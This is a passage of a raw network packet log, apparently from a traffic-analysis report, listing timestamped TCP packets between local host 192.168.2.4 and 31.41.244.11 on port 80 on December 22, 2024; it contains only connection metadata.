                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.133243084 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.133260012 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.133289099 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.133305073 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.134031057 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.134114027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.134131908 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.134164095 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.134179115 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.134893894 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.134999037 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.135015965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.135046005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.135061026 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.135803938 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.135870934 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.135886908 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.135917902 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.135932922 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.136658907 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.136769056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.136785984 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.136815071 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.136831999 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.137574911 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.137731075 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.137751102 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.137788057 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.137804031 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.138505936 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.138588905 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.138606071 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.138653040 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.138684988 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.139332056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.139436007 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.139452934 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.139489889 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.139503956 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.140208960 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.140319109 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.140336037 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.140372992 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.140398979 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.141158104 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.141230106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.141247034 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.141283989 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.141314983 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.142019033 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.142090082 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.142106056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.142143965 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.142159939 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.142959118 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.143110991 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.143126965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.143165112 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.143815994 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.144162893 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.144211054 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.144213915 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.144228935 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.144258976 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.144277096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.145032883 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.145049095 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.145066023 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.145082951 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.145107985 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.145872116 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.145937920 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.145953894 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.145988941 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.146011114 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.146706104 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.146898985 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.146917105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.146945953 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.146969080 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.147614002 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.147742987 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.147761106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.147797108 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.147814035 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.148504019 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.148655891 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.148673058 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.148705006 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.148725033 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.149378061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.149482012 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.149501085 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.149528980 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.149544001 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.150269985 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.150428057 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.150444031 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.150475979 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.150491953 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.151130915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.151372910 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.151390076 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.151420116 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.151437044 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.157234907 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.157259941 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.157278061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.157306910 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.157318115 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.157423019 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.157452106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.157468081 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.157500982 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.158241987 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.158263922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.158308983 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.314991951 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315037966 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315054893 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315077066 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315119982 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315119982 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315365076 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315418959 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315475941 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315495014 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315522909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.315537930 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.316260099 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.316304922 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.316374063 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.316390991 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.316416979 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.316433907 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.317274094 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.317291021 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.317306995 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.317318916 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.317341089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.317349911 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.318012953 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.318058014 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.318131924 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.318147898 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.318175077 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.318190098 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.318923950 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.318970919 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.319070101 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.319087029 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.319114923 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.319129944 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.319829941 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.319875956 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.319920063 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.319937944 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.319987059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.320010900 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.320722103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.320769072 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.320810080 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.320827007 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.320858002 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.320873976 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.321552038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.321599007 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.321655989 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.321671963 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.321702957 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.321722031 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.322500944 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.322552919 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.322592974 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.322611094 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.322648048 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.322663069 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.323375940 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.323422909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.323440075 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.323457956 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.323486090 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.323498011 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.324248075 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.324294090 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.324361086 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.324378014 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.324407101 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.324417114 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.325154066 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.325201035 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.325232983 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.325249910 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.325277090 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.325292110 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.326014996 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.326061964 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.326098919 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.326117039 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.326143980 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.326158047 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.326884985 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.326951027 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.326982975 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.327002048 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.327030897 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.327047110 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.327786922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.327864885 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.327896118 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.327914000 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.327944040 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.327960014 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.328685999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.328735113 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.328845024 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.328862906 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.328888893 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.328900099 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.329581022 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.329627991 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.329667091 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.329685926 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.329711914 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.329726934 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.330511093 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.330538988 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.330557108 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.330563068 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.330578089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.330600977 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.331370115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.331418991 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.331449032 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.331466913 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.331492901 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.331506968 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.332221031 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.332277060 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.332297087 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.332343102 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.332432032 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.332475901 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.333152056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.333197117 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.333261013 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.333277941 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.333302975 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.333317041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.334022999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.334074974 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.334089041 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.334106922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.334134102 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.334147930 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.334992886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.335021973 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.335040092 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.335042000 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.335064888 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.335078955 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.335783005 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.335832119 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.336030960 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.336077929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.336168051 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.336184978 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.336211920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.336226940 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.336982965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.337033987 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.337034941 CET804976531.41.244.11192.168.2.4
